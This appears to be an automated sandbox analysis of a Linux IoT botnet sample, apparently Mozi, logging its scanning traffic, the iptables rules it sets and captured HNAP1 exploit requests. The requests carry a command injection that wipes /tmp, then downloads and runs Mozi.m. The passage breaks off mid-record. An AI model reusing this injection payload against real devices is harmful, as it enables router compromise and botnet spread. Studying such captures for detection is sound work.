                Source: global trafficTCP traffic: 192.168.2.20:52792 -> 24.137.84.52:8080
                Source: global trafficTCP traffic: 192.168.2.20:33732 -> 177.171.241.133:49152
                Source: global trafficTCP traffic: 192.168.2.20:46042 -> 194.114.82.36:52869
                Source: global trafficTCP traffic: 192.168.2.20:41616 -> 41.45.80.140:7574
                Source: global trafficTCP traffic: 192.168.2.20:37616 -> 204.251.181.102:8080
                Source: global trafficTCP traffic: 192.168.2.20:44400 -> 143.112.83.247:52869
                Source: global trafficTCP traffic: 192.168.2.20:36766 -> 75.208.112.233:81
                Source: global trafficTCP traffic: 192.168.2.20:33662 -> 200.234.37.2:8080
                Source: global trafficTCP traffic: 192.168.2.20:41252 -> 112.3.168.197:52869
                Source: global trafficTCP traffic: 192.168.2.20:52898 -> 27.141.18.98:49152
                Source: global trafficTCP traffic: 192.168.2.20:38744 -> 91.3.51.44:8443
                Source: global trafficTCP traffic: 192.168.2.20:55428 -> 47.137.7.27:8080
                Source: global trafficTCP traffic: 192.168.2.20:51092 -> 166.164.230.183:49152
                Source: global trafficTCP traffic: 192.168.2.20:41278 -> 34.54.225.13:7574
                Source: global trafficTCP traffic: 192.168.2.20:48980 -> 24.11.89.192:5555
                Source: global trafficTCP traffic: 192.168.2.20:34786 -> 14.223.97.170:8080
                Source: global trafficTCP traffic: 192.168.2.20:44996 -> 103.99.243.75:49152
                Source: global trafficTCP traffic: 192.168.2.20:57654 -> 51.128.81.140:52869
                Source: global trafficTCP traffic: 192.168.2.20:56984 -> 86.187.216.50:8080
                Source: global trafficTCP traffic: 192.168.2.20:59450 -> 44.178.68.126:52869
                Source: global trafficTCP traffic: 192.168.2.20:49570 -> 99.55.126.64:49152
                Source: global trafficTCP traffic: 192.168.2.20:53626 -> 212.252.189.231:52869
                Source: global trafficTCP traffic: 192.168.2.20:57754 -> 67.141.150.157:7574
                Source: global trafficTCP traffic: 192.168.2.20:42598 -> 82.82.13.16:7574
                Source: global trafficTCP traffic: 192.168.2.20:35694 -> 59.92.7.51:8080
                Source: global trafficTCP traffic: 192.168.2.20:35092 -> 47.157.4.46:8443
                Source: global trafficTCP traffic: 192.168.2.20:49572 -> 188.122.128.229:8443
                Source: global trafficTCP traffic: 192.168.2.20:35008 -> 87.170.128.148:8443
                Source: global trafficTCP traffic: 192.168.2.20:44602 -> 72.31.225.37:49152
                Source: global trafficTCP traffic: 192.168.2.20:44860 -> 152.228.90.250:8080
                Source: global trafficTCP traffic: 192.168.2.20:41078 -> 209.56.207.155:5555
                Source: global trafficTCP traffic: 192.168.2.20:59628 -> 111.107.152.130:81
                Source: global trafficTCP traffic: 192.168.2.20:36804 -> 13.45.211.234:8443
                Source: global trafficTCP traffic: 192.168.2.20:40256 -> 210.252.49.225:8080
                Source: global trafficTCP traffic: 192.168.2.20:44276 -> 134.25.64.92:49152
                Source: global trafficTCP traffic: 192.168.2.20:50358 -> 89.174.164.208:52869
                Source: global trafficTCP traffic: 192.168.2.20:59184 -> 189.234.220.98:52869
                Source: global trafficTCP traffic: 192.168.2.20:46178 -> 29.148.154.160:37215
                Source: global trafficTCP traffic: 192.168.2.20:60542 -> 105.104.101.61:52869
                Source: global trafficTCP traffic: 192.168.2.20:57624 -> 39.63.197.41:8080
                Source: global trafficTCP traffic: 192.168.2.20:33714 -> 195.57.220.195:37215
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 185.130.70.237:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 148.236.161.228:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 170.193.219.164:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 95.127.13.97:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 145.141.224.81:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 36.38.147.114:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 38.66.22.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 1.24.25.210:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 104.35.176.53:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 164.22.155.213:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 112.37.18.36:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 35.232.255.30:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 159.77.14.210:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 168.153.87.219:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 174.70.15.219:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 134.248.182.114:2323
                Source: global trafficTCP traffic: 192.168.2.20:47942 -> 11.204.139.149:7574
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 31.19.63.66:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 65.18.237.147:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 45.157.127.192:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 116.118.233.89:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 71.174.25.150:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 100.144.218.21:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 130.2.227.224:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 81.173.47.125:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 212.161.205.179:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 121.211.248.199:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 119.74.40.73:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 206.129.47.162:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 41.107.234.16:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 18.110.27.62:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 185.178.179.85:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 220.195.212.170:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 219.112.25.112:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 58.206.104.58:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 126.53.17.15:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 8.247.166.19:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 5.118.81.170:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 165.138.141.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 65.181.128.45:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 170.89.93.136:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 121.147.191.42:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 60.143.240.242:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 72.197.158.20:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 206.20.66.135:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 186.194.239.214:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 165.187.11.238:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 198.85.9.99:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 167.200.246.250:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 159.157.87.236:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 180.186.110.160:2323
                Source: global trafficTCP traffic: 192.168.2.20:57578 -> 182.239.51.93:49152
                Source: global trafficTCP traffic: 192.168.2.20:40412 -> 4.161.141.180:49152
                Source: global trafficTCP traffic: 192.168.2.20:52528 -> 36.183.244.225:8443
                Source: global trafficTCP traffic: 192.168.2.20:41794 -> 40.233.175.103:8080
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 13.73.11.39:1023
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 94.17.28.194:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 113.107.225.229:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 209.121.60.1:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 103.18.14.97:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 94.210.194.136:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 84.62.181.33:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 161.71.248.209:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 161.254.98.127:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 220.254.157.92:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 34.22.97.104:2323
                Source: global trafficTCP traffic: 192.168.2.20:38966 -> 85.88.159.213:2323
                Source: /bin/sh (PID: 4635)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4668)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4671)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4707)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4733)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4754)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4772)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4776)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4811)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4814)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4823)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4846)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4894)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4920)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4944)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4948)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4957)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4980)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5021)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5024)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5032)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5053)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5080)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5107)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5135)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5149)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5172)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5186)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5210)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5227)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5249)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5252)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.132.44.102:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.58.36.52:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 173.222.98.151:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 149.47.68.142:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 134.84.133.102:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 